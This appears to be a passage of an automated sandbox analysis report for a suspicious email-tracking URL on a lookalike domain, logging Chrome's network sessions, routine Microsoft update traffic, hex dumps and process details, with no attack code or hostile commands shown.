            Oct 23, 2024 20:24:39.569964886 CEST1.1.1.1192.168.2.160x6ed7No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
            Oct 23, 2024 20:24:39.570099115 CEST1.1.1.1192.168.2.160xb417No error (0)www.google.com65IN (0x0001)false
            Oct 23, 2024 20:25:39.621705055 CEST1.1.1.1192.168.2.160x5948No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
            Oct 23, 2024 20:25:39.622015953 CEST1.1.1.1192.168.2.160x83f0No error (0)www.google.com65IN (0x0001)false
            • fs.microsoft.com
            • slscr.update.microsoft.com
            • click.email.traininng.com
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.164970913.111.71.11806836C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Oct 23, 2024 20:24:35.708239079 CEST574OUTGET /open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 HTTP/1.1
            Host: click.email.traininng.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Oct 23, 2024 20:24:36.378110886 CEST199INHTTP/1.1 200 OK
            Cache-Control: no-cache; max-age=0
            Content-Type: image/gif
            Date: Wed, 23 Oct 2024 18:24:35 GMT
            Connection: close
            Content-Length: 43
            Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
            Data Ascii: GIF89a!,D;


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.164971013.111.71.11806836C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Oct 23, 2024 20:24:36.485855103 CEST528OUTGET /favicon.ico HTTP/1.1
            Host: click.email.traininng.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Oct 23, 2024 20:24:36.648236990 CEST1236INHTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Wed, 23 Oct 2024 18:24:36 GMT
            Connection: close
            Content-Length: 1245
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
            Oct 23, 2024 20:24:36.648472071 CEST138INData Raw: 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62
            Data Ascii: ing for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.1649712184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-10-23 18:24:38 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-10-23 18:24:38 UTC466INHTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-neu-z1
            Cache-Control: public, max-age=80494
            Date: Wed, 23 Oct 2024 18:24:38 GMT
            Connection: close
            X-CID: 2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.1649713184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-10-23 18:24:39 UTC239OUTGET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-10-23 18:24:40 UTC514INHTTP/1.1 200 OK
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=80462
            Date: Wed, 23 Oct 2024 18:24:39 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-10-23 18:24:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.1649715172.202.163.200443
            TimestampBytes transferredDirectionData
            2024-10-23 18:24:43 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-10-23 18:24:43 UTC560INHTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
            MS-CorrelationId: f74448c1-64d9-4fa0-8224-fdc4f0e883db
            MS-RequestId: 6b7aa0c2-0707-490d-8019-446dd92cfe77
            MS-CV: 7c8aTxAQzEquqv3i.0
            X-Microsoft-SLSClientCache: 2880
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Wed, 23 Oct 2024 18:24:43 GMT
            Connection: close
            Content-Length: 24490
            2024-10-23 18:24:43 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
            2024-10-23 18:24:43 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.1649716172.202.163.200443
            TimestampBytes transferredDirectionData
            2024-10-23 18:25:20 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-10-23 18:25:20 UTC560INHTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
            MS-CorrelationId: 76784dfd-c216-4bee-b453-29f5bfac4554
            MS-RequestId: 52bd8393-818a-4bc8-bbf2-fb2cab979cc5
            MS-CV: jDBiA6dXm0W80Byd.0
            X-Microsoft-SLSClientCache: 1440
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Wed, 23 Oct 2024 18:25:20 GMT
            Connection: close
            Content-Length: 30005
            2024-10-23 18:25:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
            2024-10-23 18:25:21 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:1
            Start time:14:24:32
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:14:24:33
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:14:24:34
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0"
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly